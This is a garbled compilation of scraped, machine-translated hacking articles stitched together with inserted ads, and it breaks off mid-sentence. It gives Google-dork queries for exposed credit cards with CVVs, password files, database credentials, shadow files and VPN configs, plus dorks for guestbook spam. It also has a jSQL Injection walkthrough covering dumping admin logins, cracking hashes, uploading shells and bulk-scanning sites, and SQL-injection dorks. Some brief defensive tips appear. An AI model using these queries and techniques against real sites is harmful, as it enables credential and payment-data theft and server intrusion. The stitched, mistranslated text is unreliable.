Instructions for using jSQL Injection, a multifunctional tool for finding and exploiting SQL injections in Kali Linux. Using Google's Little-Known Features to Find Hidden Uses of Google as a CGI Scanner

Receiving private data does not always mean hacking - sometimes it is published in public access. Knowledge Google settings and a little ingenuity will allow you to find a lot of interesting things - from credit card numbers to FBI documents.

WARNING

All information is provided for informational purposes only. Neither the editors nor the author are responsible for any possible harm caused by the materials of this article.

Everything is connected to the Internet today, caring little about restricting access. Therefore, many private data become the prey of search engines. Spider robots are no longer limited to web pages, but index all content available on the Web and constantly add confidential information to their databases. Learning these secrets is easy - you just need to know how to ask about them.

Looking for files

In capable hands, Google will quickly find everything that is bad on the Web, such as personal information and files for official use. They are often hidden like a key under a rug: there are no real access restrictions, the data just lies in the back of the site, where links do not lead. Google's standard web interface only provides basic settings advanced search, but even those will suffice.

There are two operators you can use to restrict Google searches to files of a certain type: filetype and ext . The first sets the format that the search engine determined by the file header, the second - the file extension, regardless of its internal content. When searching in both cases, you need to specify only the extension. Initially, the ext operator was convenient to use in cases where there were no specific format features for the file (for example, to search for ini and cfg configuration files, which can contain anything). Now Google algorithms changed, and there is no visible difference between the operators - the results are the same in most cases.


Filtering the output

By default, Google searches for words and in general for any characters entered in all files on indexed pages. You can limit the search scope by the top-level domain, a specific site, or by the location of the desired sequence in the files themselves. For the first two options, the site statement is used, followed by the name of the domain or the selected site. In the third case, a whole set of operators allows you to search for information in service fields and metadata. For example, allinurl will find the specified in the body of the links themselves, allinanchor - in the text provided with the tag , allintitle - in the page headers, allintext - in the body of the pages.

For each operator there is a lighter version with a shorter name (without the prefix all). The difference is that allinurl will find links with all words, while inurl will only find links with the first of them. The second and subsequent words from the query can appear anywhere on web pages. The inurl operator also differs from another similar in meaning - site . The first one also allows you to find any sequence of characters in the link to the desired document (for example, /cgi-bin/), which is widely used to find components with known vulnerabilities.

Let's try it in practice. We take the allintext filter and make the query return a list of credit card numbers and verification codes, which will expire only after two years (or when their owners get tired of feeding everyone in a row).

Allintext: card number expiration date /2017 cvv

When you read on the news that a young hacker "hacked into the servers" of the Pentagon or NASA, stealing classified information, then in most cases it is precisely this elementary technique of using Google. Suppose we are interested in a list of NASA employees and their contact details. Surely such a list is in electronic form. For convenience or due to an oversight, it can also lie on the organization's website itself. It is logical that in this case there will be no references to it, since it is intended for internal use. What words can be in such a file? At least - the field "address". It is easy to test all these assumptions.


inurl:nasa.gov filetype:xlsx "address"


We use bureaucracy

Such finds are a pleasant trifle. The really solid catch comes from a more detailed knowledge of Google Webmaster Operators, the Web itself, and the structure of what you're looking for. Knowing the details, you can easily filter the output and refine the properties of the files you need in order to get really valuable data in the rest. It's funny that bureaucracy comes to the rescue here. It produces typical formulations that make it convenient to search for secret information that has accidentally leaked onto the Web.

For example, the Distribution statement stamp, which is mandatory in the office of the US Department of Defense, means standardized restrictions on the distribution of a document. The letter A marks public releases in which there is nothing secret; B - intended for internal use only, C - strictly confidential, and so on up to F. Separately, there is the letter X, which marks especially valuable information that represents a state secret of the highest level. Let those who are supposed to do it on duty look for such documents, and we will limit ourselves to files with the letter C. According to DoDI 5230.24, such marking is assigned to documents containing a description of critical technologies that fall under export control. You can find such carefully guarded information on sites in the .mil top-level domain allocated to the US Army.

"DISTRIBUTION STATEMENT C" inurl:navy.mil

It is very convenient that only sites from the US Department of Defense and its contract organizations are collected in the .mil domain. Domain-limited search results are exceptionally clean, and the titles speak for themselves. It is practically useless to search for Russian secrets in this way: chaos reigns in the .ru and .rf domains, and the names of many weapons systems sound like botanical (PP "Kiparis", self-propelled guns "Acacia") or even fabulous (TOS "Pinocchio").


By carefully examining any document from a site in the .mil domain, you can see other markers to refine your search. For example, a reference to the export restrictions "Sec 2751", which is also convenient to search for interesting technical information. From time to time, it is removed from official sites, where it once appeared, so if you can’t follow an interesting link in the search results, use the Google cache (cache operator) or the Internet Archive website.

We climb into the clouds

In addition to accidentally declassified documents from government departments, links to personal files from Dropbox and other data storage services that create "private" links to publicly published data occasionally pop up in the Google cache. It's even worse with alternative and self-made services. For example, the following query finds the data of all Verizon clients that have an FTP server installed and actively using a router on their router.

Allinurl:ftp://verizon.net

There are now more than forty thousand such smart people, and in the spring of 2015 there were an order of magnitude more. Instead of Verizon.net, you can substitute the name of any well-known provider, and the more famous it is, the larger the catch can be. Through the built-in FTP server, you can see files on an external drive connected to the router. Usually this is a NAS for remote work, a personal cloud, or some kind of peer-to-peer file download. All the content of such media is indexed by Google and other search engines, so you can access files stored on external drives via a direct link.

Peeping configs

Before the wholesale migration to the clouds, simple FTP servers, which also lacked vulnerabilities, ruled as remote storages. Many of them are still relevant today. For example, the popular WS_FTP Professional program stores configuration data, user accounts, and passwords in the ws_ftp.ini file. It is easy to find and read because all entries are stored in plain text and passwords are encrypted using the Triple DES algorithm after minimal obfuscation. In most versions, simply discarding the first byte is sufficient.

Decrypting such passwords is easy using the WS_FTP Password Decryptor utility or a free web service.

When talking about hacking an arbitrary site, they usually mean getting a password from logs and backups of CMS or e-commerce application configuration files. If you know their typical structure, you can easily indicate keywords. Lines like those found in ws_ftp.ini are extremely common. For example, Drupal and PrestaShop always have a user ID (UID) and a corresponding password (pwd), and all information is stored in files with the .inc extension. You can search for them like this:

"pwd=" "UID=" ext:inc

We reveal passwords from the DBMS

In the configuration files of SQL servers, names and addresses Email users are stored in clear text, and their MD5 hashes are written instead of passwords. Decrypting them, strictly speaking, is impossible, but you can find a match among known hash-password pairs.

Until now, there are DBMSs that do not even use password hashing. The configuration files of any of them can simply be viewed in the browser.

Intext:DB_PASSWORD filetype:env

With the advent of Windows servers, the place of configuration files was partly taken by the registry. You can search through its branches in exactly the same way, using reg as the file type. For example, like this:

Filetype:reg HKEY_CURRENT_USER "Password"=

Don't Forget the Obvious

Sometimes it is possible to get to classified information with the help of data accidentally opened and caught by Google. The ideal option is to find a list of passwords in some common format. Store account information in text file, Word document or electronic Excel spreadsheet Only desperate people can, but there are always enough of them.

Filetype:xls inurl:password

On the one hand, there are many means to prevent such incidents. It is necessary to specify adequate access rights in htaccess, patch CMS, do not use left scripts and close other holes. There is also a file with a robots.txt exclusion list, which prohibits search engines from indexing the files and directories specified in it. On the other hand, if the robots.txt structure on some server differs from the standard one, then it immediately becomes clear what they are trying to hide on it.

The list of directories and files on any site is preceded by the standard inscription index of. Since it must appear in the title for service purposes, it makes sense to limit its search to the intitle operator. Interesting stuff can be found in the /admin/, /personal/, /etc/ and even /secret/ directories.

Follow the updates

Relevance is extremely important here: old vulnerabilities are closed very slowly, but Google and its search results are constantly changing. There is even a difference between the "last second" filter (&tbs=qdr:s at the end of the request url) and the "real time" filter (&tbs=qdr:1).

Date timespan latest update Google's file is also indicated implicitly. Through the graphical web interface, you can select one of the typical periods (hour, day, week, and so on) or set a date range, but this method is not suitable for automation.

From the appearance of the address bar, one can only guess about a way to limit the output of results using the &tbs=qdr: construct. The letter y after it specifies a limit of one year (&tbs=qdr:y), m shows the results for the last month, w for the week, d for the past day, h for the last hour, n for the minute, and s for the give me a sec. The most recent results just made known to Google are found using the &tbs=qdr:1 filter.

If you need to write a tricky script, it will be useful to know that the date range is set in Google in Julian format through the daterange operator. For example, this is how you can find a list of PDF documents with the word confidential uploaded between January 1st and July 1st, 2015.

Confidential filetype:pdf daterange:2457024-2457205

The range is specified in Julian date format without decimals. It is inconvenient to translate them manually from the Gregorian calendar. It's easier to use a date converter.

Targeting and filtering again

In addition to specifying additional operators in the search query, they can be sent directly in the link body. For example, the filetype:pdf trait corresponds to the as_filetype=pdf construct. Thus, it is convenient to set any clarifications. Let's say that the output of results only from the Republic of Honduras is set by adding the construction cr=countryHN to the search URL, but only from the city of Bobruisk - gcs=Bobruisk . See the developer section for a complete list of .

Google's automation tools are designed to make life easier, but often add to the hassle. For example, a user's city is determined by the user's IP through WHOIS. Based on this information, Google not only balances the load between servers, but also changes the search results. Depending on the region, for the same query, different results will get to the first page, and some of them may turn out to be completely hidden. Feel like a cosmopolitan and search for information from any country will help its two-letter code after the directive gl=country . For example, the code for the Netherlands is NL, while the Vatican and North Korea do not have their own code in Google.

Often search results are littered even after using a few advanced filters. In this case, it is easy to refine the query by adding a few exception words to it (each of them is preceded by a minus sign). For example, banking , names , and tutorial are often used with the word Personal. Therefore, cleaner search results will show not a textbook example of a query, but a refined one:

Intitle:"Index of /Personal/" -names -tutorial -banking

Last Example

A sophisticated hacker is distinguished by the fact that he provides himself with everything he needs on his own. For example, a VPN is a convenient thing, but either expensive or temporary and with restrictions. Signing up for yourself alone is too expensive. It's good that there are group subscriptions, but with Google It's easy to be part of a group. To do this, just find the Cisco VPN configuration file, which has a rather non-standard PCF extension and a recognizable path: Program Files\Cisco Systems\VPN Client\Profiles . One request, and you join, for example, the friendly staff of the University of Bonn.

Filetype:pcf vpn OR Group

INFO

Google finds configuration files with passwords, but many of them are encrypted or replaced with hashes. If you see strings of a fixed length, then immediately look for a decryption service.

The passwords are stored in encrypted form, but Maurice Massard has already written a program to decrypt them and is providing it for free via thecampusgeeks.com.

With the help of Google, hundreds of different types of attacks and penetration tests are performed. There are many options, affecting popular programs, major database formats, numerous PHP vulnerabilities, clouds, and so on. Knowing exactly what you're looking for makes it much easier to get the information you need (especially the information you didn't intend to make public). No Shodan single nourishes interesting ideas, but any database of indexed network resources!

How to search using google.com

Everyone probably knows how to use a search engine like Google =) But not everyone knows that if you correctly compose search query with the help of special designs, you can achieve the results of what you are looking for much more efficiently and quickly =) In this article I will try to show what and how you need to do in order to search correctly

Google supports several advanced search operators that have special meaning when searching on google.com. Typically, these operators modify the search, or even tell Google to do completely different types of searches. For example, the design link: is a special operator, and the query link:www.google.com will not give you a normal search, but will instead find all web pages that have links to google.com.
alternative request types

cache: If you include other words in the query, Google will highlight those included words within the cached document.
For example, cache:www.web site will show cached content with the word "web" highlighted.

link: the above search query will show web pages that contain links to the specified query.
For example: link:www.website will display all pages that have a link to http://www.site

related: Displays web pages that are "related" to the specified web page.
For example, related: www.google.com will list web pages that are similar home page Google.

info: Request Information: will provide some information that Google has about the requested web page.
For example, info:website will show information about our forum =) (Armada - Forum of adult webmasters).

Other information requests

define: The define: query will provide a definition of the words you type after this, compiled from various online sources. The definition will be for the entire phrase entered (that is, it will include all words in the exact query).

stocks: If you start a query with stocks: Google will treat the rest of the query terms as stock tickers, and link to a page showing the prepared information for those characters.
For example, stocks: intel yahoo will show information about Intel and Yahoo. (Note that you must print breaking news characters, not the company name)

Request Modifiers

site: If you include site: in your query, Google will limit the results to the websites it finds in that domain.
You can also search for individual zones, such as ru, org, com, etc ( site:com site:ru)

allintitle: If you run a query with allintitle:, Google will limit the results with all the query words in the title.
For example, allintitle: google search will return all Google search pages like images, Blog, etc

title: If you include intitle: in your query, Google will restrict results to documents containing that word in the title.
For example, title:Business

allinurl: If you run a query with allinurl: Google will limit the results with all the query words in the URL.
For example, allinurl: google search will return documents with google and search in the title. Also, as an option, you can separate words with a slash (/) then the words on both sides of the slash will be searched within the same page: Example allinurl: foo/bar

inurl: If you include inurl: in your query, Google will limit the results to documents containing that word in the URL.
For example, Animation inurl:website

intext: searches only in the text of the page for the specified word, ignoring the title and texts of links, and other things not related to. There is also a derivative of this modifier - allintext: those. further, all words in the query will be searched only in the text, which is also important, ignoring frequently used words in links
For example, intext:forum

daterange: searches in time frames (daterange:2452389-2452389), dates for time are specified in Julian format.

Well, and all sorts of interesting examples of requests

Examples of compiling queries for Google. For spammers

inurl:control.guest?a=sign

Site:books.dreambook.com “Homepage URL” “Sign my” inurl:sign

Site:www.freegb.net Homepage

Inurl:sign.asp "Character Count"

"Message:" inurl:sign.cfm "Sender:"

inurl:register.php “User Registration” “Website”

Inurl:edu/guestbook “Sign the Guestbook”

Inurl:post "Post Comment" "URL"

Inurl:/archives/ “Comments:” “Remember info?”

“Script and Guestbook Created by:” “URL:” “Comments:”

inurl:?action=add “phpBook” “URL”

Intitle:"Submit New Story"

Magazines

inurl:www.livejournal.com/users/mode=reply

inurl greatestjournal.com/mode=reply

Inurl:fastbb.ru/re.pl?

inurl:fastbb.ru /re.pl? "Guest book"

Blogs

Inurl:blogger.com/comment.g?”postID”"anonymous"

Inurl:typepad.com/ “Post a comment” “Remember personal info?”

Inurl:greatestjournal.com/community/ “Post comment” “addresses of anonymous posters”

“Post comment” “addresses of anonymous posters” -

Intitle:"Post comment"

Inurl:pirillo.com “Post comment”

Forums

Inurl:gate.html?”name=Forums” “mode=reply”

inurl:”forum/posting.php?mode=reply”

inurl:”mes.php?”

inurl:”members.html”

inurl:forum/memberlist.php?”

Hacking with Google

Alexander Antipov

Search system Google (www.google.com) provides many search options. All of these features are an invaluable search tool for a first-time Internet user and at the same time an even more powerful weapon of invasion and destruction in the hands of people with evil intentions, including not only hackers, but also non-computer criminals and even terrorists.
(9475 views in 1 week)


Denis Batrankov
denisNOSPAMixi.ru

Attention:This article is not a guide to action. This article is written for you, WEB server administrators, so that you will lose the false feeling that you are safe, and you will finally understand the insidiousness of this method of obtaining information and set about protecting your site.

Introduction

For example, I found 1670 pages in 0.14 seconds!

2. Let's enter another line, for example:

inurl:"auth_user_file.txt"

a little less, but this is already enough for free download and for guessing passwords (using the same John The Ripper). Below I will give some more examples.

So, you need to realize that the Google search engine has visited most of the Internet sites and cached the information contained on them. This cached information allows you to get information about the site and the content of the site without a direct connection to the site, just digging into the information that is stored internally by Google. Moreover, if the information on the site is no longer available, then the information in the cache may still be preserved. All it takes for this method is to know some Google keywords. This technique is called Google Hacking.

For the first time, information about Google Hacking appeared on the Bugtruck mailing list 3 years ago. In 2001, this topic was raised by a French student. Here is a link to this letter http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html . It gives the first examples of such requests:

1) Index of /admin
2) Index of /password
3) Index of /mail
4) Index of / +banques +filetype:xls (for france...)
5) Index of / +passwd
6) Index of/password.txt

This topic made a lot of noise in the English-reading part of the Internet quite recently: after an article by Johnny Long published on May 7, 2004. For a more complete study of Google Hacking, I advise you to go to the site of this author http://johnny.ihackstuff.com. In this article, I just want to bring you up to date.

Who can use it:
- Journalists, spies and all those people who like to stick their nose in other people's business can use this to search for compromising evidence.
- Hackers looking for suitable targets for hacking.

How Google works.

To continue the conversation, let me remind you of some of the keywords used in Google queries.

Search using the + sign

Google excludes unimportant, in its opinion, words from the search. For example, interrogative words, prepositions and articles in English language: for example are, of, where. In Russian, Google seems to consider all words important. If the word is excluded from the search, then Google writes about it. In order for Google to start searching for pages with these words, you need to add a + sign before them without a space before the word. For example:

ace + of base

Search by sign -

If Google finds a large number of pages from which you want to exclude pages with certain topics, you can force Google to search only for pages that do not contain certain words. To do this, you need to indicate these words by putting a sign in front of each - without a space before the word. For example:

fishing - vodka

Search with the ~ sign

You may want to look up not only the specified word, but also its synonyms. To do this, precede the word with the symbol ~.

Finding an exact phrase using double quotes

Google searches on each page for all occurrences of the words that you wrote in the query string, and it does not care about the relative position of the words, the main thing is that all the specified words are on the page at the same time (this is the default action). To find exact phrase- it must be enclosed in quotation marks. For example:

"bookend"

To have at least one of the specified words, you must specify logical operation explicitly: OR. For example:

book safety OR protection

In addition, you can use the * sign in the search string to denote any word and. to represent any character.

Finding words with additional operators

There are search operators that are specified in the search string in the format:

operator:search_term

The spaces next to the colon are not needed. If you insert a space after a colon, you will see an error message, and before it, Google will use them as a normal search string.
There are groups of additional search operators: languages ​​- indicate in which language you want to see the result, date - limit the results for the past three, six or 12 months, occurrences - indicate where in the document you need to look for the string: everywhere, in the title, in the URL, domains - search for the specified site or vice versa exclude it from the search, Safe search- block sites containing the specified type of information and remove them from the search results pages.
However, some operators do not need an additional parameter, for example, the query " cache:www.google.com" can be called as a full search string, and some keywords, on the contrary, require a search word, for example " site:www.google.com help". In the light of our subject, let's look at following statements:

Operator

Description

Requires an additional parameter?

search only for the site specified in search_term

search only in documents with type search_term

find pages containing search_term in title

find pages containing all the words search_term in the title

find pages containing the word search_term in their address

find pages containing all the words search_term in their address

Operator site: limits the search to only the specified site, and you can specify not only Domain name but also the IP address. For example, enter:

Operator filetype: restricts searches to files of a certain type. For example:

As of the date of this article, Google can search within 13 different file formats:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus Word Pro (lwp)
  • MacWrite(mw)
  • Microsoft Excel(xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word(doc)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Rich Text Format (rtf)
  • Shockwave Flash (swf)
  • Text (ans, txt)

Operator link: shows all pages that point to the specified page.
It must always be interesting to see how many places on the Internet know about you. We try:

Operator cache: shows the Google cached version of the site as it looked when google latest visited this page once. We take any frequently changing site and look:

Operator title: searches for the specified word in the page title. Operator allintitle: is an extension - it looks for all the specified few words in the page title. Compare:

intitle:flight to mars
intitle:flight intitle:on intitle:mars
allintitle:flight to mars

Operator inurl: causes Google to show all pages containing the specified string in the URL. allinurl: searches for all words in a URL. For example:

allinurl:acid_stat_alerts.php

This command is especially useful for those who don't have SNORT - at least they can see how it works on a real system.

Google Hacking Methods

So, we found out that, using a combination of the above operators and keywords, anyone can collect the necessary information and search for vulnerabilities. These techniques are often referred to as Google Hacking.

Site Map

You can use the site: statement to see all the links that Google has found on the site. Usually, pages that are dynamically created by scripts are not indexed using parameters, so some sites use ISAPI filters so that links are not in the form /article.asp?num=10&dst=5, but with slashes /article/abc/num/10/dst/5. This is done to ensure that the site is generally indexed by search engines.

Let's try:

site:www.whitehouse.gov whitehouse

Google thinks that every page on a site contains the word whitehouse. This is what we use to get all the pages.
There is also a simplified version:

site:whitehouse.gov

And the best part is that the comrades from whitehouse.gov didn't even know that we looked at the structure of their site and even looked into the cached pages that Google downloaded for itself. This can be used to study the structure of sites and view content without being noticed for the time being.

Listing files in directories

WEB servers can show lists of server directories instead of the usual HTML pages. This is usually done so that users select and download certain files. However, in many cases administrators have no intention of showing the contents of a directory. This occurs due to incorrect server configuration or lack of home page in the directory. As a result, the hacker has a chance to find something interesting in the directory and use it for his own purposes. To find all such pages, it is enough to notice that they all contain the words: index of in their title. But since the index of words contain not only such pages, we need to refine the query and take into account the keywords on the page itself, so queries like:

intitle:index.of parent directory
intitle:index.of name size

Since most directory listings are intentional, you may have a hard time finding misplaced listings the first time. But at least you will be able to use the listings to determine the WEB server version, as described below.

Getting the WEB server version.

Knowing the WEB server version is always helpful before starting any hacker attack. Again thanks to Google it is possible to get this information without connecting to a server. If you carefully look at the directory listing, you can see that the name of the WEB server and its version are displayed there.

Apache1.3.29 - ProXad Server at trf296.free.fr Port 80

An experienced administrator can change this information, but, as a rule, it is true. Thus, to get this information, it is enough to send a request:

intitle:index.of server.at

To get information for a specific server, we refine the request:

intitle:index.of server.at site:ibm.com

Or vice versa, we are looking for servers running on a specific version of the server:

intitle:index.of Apache/2.0.40 Server at

This technique can be used by a hacker to find a victim. If, for example, he has an exploit for a certain version of the WEB server, then he can find it and try the existing exploit.

You can also get the server version by looking at the pages that are installed by default when installing a fresh version of the WEB server. For example, to see the Apache 1.2.6 test page, just type

intitle:Test.Page.for.Apache it.worked!

Moreover, some operating systems immediately install and launch the WEB server during installation. However, some users are not even aware of this. Naturally, if you see that someone has not deleted the default page, then it is logical to assume that the computer has not been subjected to any configuration at all and is probably vulnerable to attacks.

Try looking for IIS 5.0 pages

allintitle:Welcome to Windows 2000 Internet Services

In the case of IIS, you can determine not only the version of the server, but also Windows version and service pack.

Another way to determine the version of the WEB server is to look for manuals (help pages) and examples that can be installed on the site by default. Hackers have found quite a few ways to use these components to gain privileged access to the site. That is why you need to remove these components on the production site. Not to mention the fact that by the presence of these components you can get information about the type of server and its version. For example, let's find the apache manual:

inurl:manual apache directives modules

Using Google as a CGI scanner.

CGI scanner or WEB scanner is a utility for searching for vulnerable scripts and programs on the victim's server. These utilities need to know what to look for, for this they have a whole list of vulnerable files, for example:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

We can find each of these files using Google, additionally using the words index of or inurl with the file name in the search bar: we can find sites with vulnerable scripts, for example:

allinurl:/random_banner/index.cgi

With additional knowledge, a hacker could exploit a script vulnerability and use the vulnerability to force the script to serve any file stored on the server. For example a password file.

How to protect yourself from being hacked through Google.

1. Do not upload important data to the WEB server.

Even if you posted the data temporarily, you can forget about it or someone will have time to find and take this data before you erase it. Don't do it. There are many other ways to transfer data that protect it from theft.

2. Check your site.

Use the described methods to research your site. Check your site periodically for new methods that appear on the site http://johnny.ihackstuff.com. Remember that if you want to automate your actions, you need to get special permission from Google. If you carefully read http://www.google.com/terms_of_service.html, then you will see the phrase: You may not send automated queries of any sort to Google's system without express permission in advance from Google.

3. You may not need Google to index your site or part of it.

Google allows you to remove a link to your site or part of it from its database, as well as remove pages from the cache. In addition, you can prohibit the search for images on your site, prohibit the display of short fragments of pages in search results All the possibilities for deleting a site are described on the page http://www.google.com/remove.html. To do this, you must confirm that you are really the owner of this site or insert tags on the page or

4. Use robots.txt

It is known that search engines look into the robots.txt file at the root of the site and do not index those parts that are marked with the word Disallow. You can use this to prevent part of the site from being indexed. For example, to avoid indexing the entire site, create a robots.txt file containing two lines:

User-agent: *
disallow: /

What else happens

So that life does not seem like honey to you, I will say in the end that there are sites that follow those people who, using the above methods, look for holes in scripts and WEB servers. An example of such a page is

Appendix.

A little sweet. Try one of the following for yourself:

1. #mysql dump filetype:sql - search for database dumps mySQL data
2. Host Vulnerability Summary Report - will show you what vulnerabilities other people have found
3. phpMyAdmin running on inurl:main.php - this will force close the control via phpmyadmin panel
4. Not for distribution confidential
5. Request Details Control Tree Server Variables
6. Running in child mode
7. This report was generated by WebLog
8. intitle:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs - maybe someone needs firewall configuration files? :)
10. intitle:index.of finances.xls - hmm....
11. intitle:Index of dbconvert.exe chats - icq chat logs
12. intext:Tobias Oetiker traffic analysis
13. intitle:Usage Statistics for Generated by Webalizer
14. intitle:statistics of advanced web statistics
15. intitle:index.of ws_ftp.ini - ws ftp config
16. inurl:ipsec.secrets holds shared secrets - secret key - good find
17. inurl:main.php Welcome to phpMyAdmin
18. inurl:server-info Apache Server Information
19. site:edu admin grades
20. ORA-00921: unexpected end of SQL command - get paths
21. intitle:index.of trillian.ini
22. intitle:Index of pwd.db
23. intitle:index.of people.lst
24. intitle:index.of master.passwd
25.inurl:passlist.txt
26. intitle:Index of .mysql_history
27. intitle:index of intext:globals.inc
28. intitle:index.of administrators.pwd
29. intitle:Index.of etc shadow
30. intitle:index.of secring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:perform filetype:ini

  • "Hacking mit Google"
  • Training center "Informzaschita" http://www.itsecurity.ru - a leading specialized center in the field of education information security(License of the Moscow Committee of Education No. 015470, State Accreditation No. 004251). The only authorized training center of Internet Security Systems and Clearswift in Russia and CIS countries. Microsoft authorized training center (Security specialization). Training programs are coordinated with the State Technical Commission of Russia, FSB (FAPSI). Certificates of training and state documents on advanced training.

    SoftKey is unique service for buyers, developers, dealers and affiliate partners. In addition, this is one of the best online software stores in Russia, Ukraine, Kazakhstan, which offers customers a wide range, many payment methods, prompt (often instant) order processing, tracking the order fulfillment process in the personal section, various discounts from the store and manufacturers ON.

    Run downloaded file double click(Must have virtual machine ).

    3. Anonymity when checking the site for SQL injections

    Setting up Tor and Privoxy in Kali Linux

    [Section under development]

    Setting up Tor and Privoxy on Windows

    [Section under development]

    jSQL Injection proxy settings

    [Section under development]

    4. Checking the site for SQL injection with jSQL Injection

    Working with the program is extremely simple. Just enter the site address and press ENTER.

    The following screenshot shows that the site is vulnerable to three types of SQL injections at once (information about them is indicated in the lower right corner). By clicking on the names of the injections, you can switch the method used:

    Also, we have already displayed the existing databases.

    You can see the contents of each table:

    Usually, the most interesting part of the tables is the administrator credentials.

    If you are lucky and you found the administrator's data, then it's too early to rejoice. You also need to find the admin panel, where to enter these data.

    5. Search for admins with jSQL Injection

    To do this, go to the next tab. Here we are met by a list of possible addresses. You can select one or more pages to check:

    The convenience is that you do not need to use other programs.

    Unfortunately, there are not very many careless programmers who store passwords in clear text. Quite often in the password string we see something like

    8743b52063cd84097a65d1633f5c74f5

    This is a hash. You can decrypt it with brute force. And… jSQL Injection has a built-in brute-forcer.

    6. Brute-forcing hashes with jSQL Injection

    Undoubted convenience is that you do not need to look for other programs. There is support for many of the most popular hashes.

    This is not the best option. In order to become a guru in deciphering hashes, the book "" in Russian is recommended.

    But, of course, when there is no other program at hand or there is no time to study, jSQL Injection with a built-in brute-force function will come in handy.

    There are settings: you can set which characters are included in the password, the password length range.

    7. File operations after SQL injection detection

    In addition to operations with databases - reading and modifying them, if SQL injections are detected, the following file operations can be performed:

    • reading files on the server
    • uploading new files to the server
    • uploading shells to the server

    And all this is implemented in jSQL Injection!

    There are limitations - the SQL server must have file privileges. Reasonable system administrators they are disabled and access to file system cannot be obtained.

    The presence of file privileges is easy enough to check. Go to one of the tabs (reading files, creating a shell, uploading a new file) and try to perform one of the indicated operations.

    Another very important note - we need to know the exact absolute path to the file with which we will work - otherwise nothing will work.

    Look at the following screenshot:

    Any attempt to operate on a file is answered by: No FILE privilege(no file privileges). And nothing can be done here.

    If instead you have another error:

    Problem writing into [directory_name]

    This means that you incorrectly specified the absolute path where you want to write the file.

    In order to assume an absolute path, one must at least know operating system on which the server is running. To do this, switch to the Network tab.

    Such an entry (string Win64) gives us reason to assume that we are dealing with Windows OS:

    Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Connection: Keep-Alive Method: HTTP/1.1 200 OK Content-Length: 353 Date: Fri, 11 Dec 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; charset=UTF-8

    Here we have some Unix (*BSD, Linux):

    Transfer-Encoding: chunked Date: Fri, 11 Dec 2015 11:57:02 GMT Method: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Connection: keep-alive Content-Type: text/html X- Powered-By: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

    And here we have CentOS:

    Method: HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Connection: keep-alive X-Cache-Lookup: MISS from t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS from t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Date: Fri, 11 Dec 2015 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; charset=WINDOWS-1251

    On Windows, a typical site folder is C:\Server\data\htdocs\. But, in fact, if someone "thought" of making a server on Windows, then, very likely, this person has not heard anything about privileges. Therefore, you should start trying directly from the C: / Windows / directory:

    As you can see, everything went perfectly the first time.

    But the jSQL Injection shells themselves raise my doubts. If you have file privileges, then you may well upload something with a web interface.

    8. Bulk checking sites for SQL injections

    And even jSQL Injection has this feature. Everything is extremely simple - upload a list of sites (can be imported from a file), select those that you want to check and click the appropriate button to start the operation.

    Output by jSQL Injection

    jSQL Injection is a good, powerful tool for finding and then using SQL injections found on sites. Its undoubted advantages: ease of use, built-in related functions. jSQL Injection can be a beginner's best friend when analyzing websites.

    Of the shortcomings, I would note the impossibility of editing databases (at least I did not find this functionality). As with all tools with a graphical interface, the inability to use in scripts can be attributed to the disadvantages of this program. Nevertheless, some automation is possible in this program too - thanks to the built-in mass site check function.

    jSQL Injection is much more convenient to use than sqlmap . But sqlmap supports more kinds of SQL injection, has file firewall options, and some other features.

    Bottom line: jSQL Injection is a beginner hacker's best friend.

    You can find help for this program in the Kali Linux Encyclopedia on this page: http://kali.tools/?p=706

    I decided to talk a little about information security. The article will be useful for novice programmers and those who have just started doing Frontend development. What is the problem?

    Many novice developers are so addicted to writing code that they completely forget about the security of their work. And most importantly, they forget about such vulnerabilities as SQL query, XXS. They also come up with easy passwords for their administrative panels and are subjected to brute force. What are these attacks and how can they be avoided?

    SQL injection

    SQL injection is the most common type of database attack that is carried out with a SQL query for a specific DBMS. Many people and even large companies suffer from such attacks. The reason is a developer's mistake when writing a database and, in fact, SQL queries.

    An SQL injection type attack is possible due to incorrect processing of input data used in SQL queries. With a successful attack by a hacker, you run the risk of losing not only the contents of the databases, but also the passwords and logs of the administrative panel, respectively. And this data will be quite enough to completely take over the site or make irreversible adjustments to it.

    The attack can be successfully reproduced in scripts written in PHP, ASP, Perl and other languages. The success of such attacks depends more on which DBMS is used and how the scenario itself is implemented. There are a lot of vulnerable sites for SQL injections in the world. This is easy to verify. It is enough to enter "dorks" - these are special requests for finding vulnerable sites. Here are some of them:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:buy.php?category=
    • inurl:article.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:page.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:article.php?id=

    How to use them? It is enough to enter them into the Google or Yandex search engine. The search engine will give you not just a vulnerable site, but also a page for this vulnerability. But we will not stop there and make sure that the page is really vulnerable. For this, it is enough to put a single quote “‘” after the value “id=1”. Something like this:

    • inurl:games.php?id=1'

    And the site will give us an error about the SQL query. What does our hacker need next?

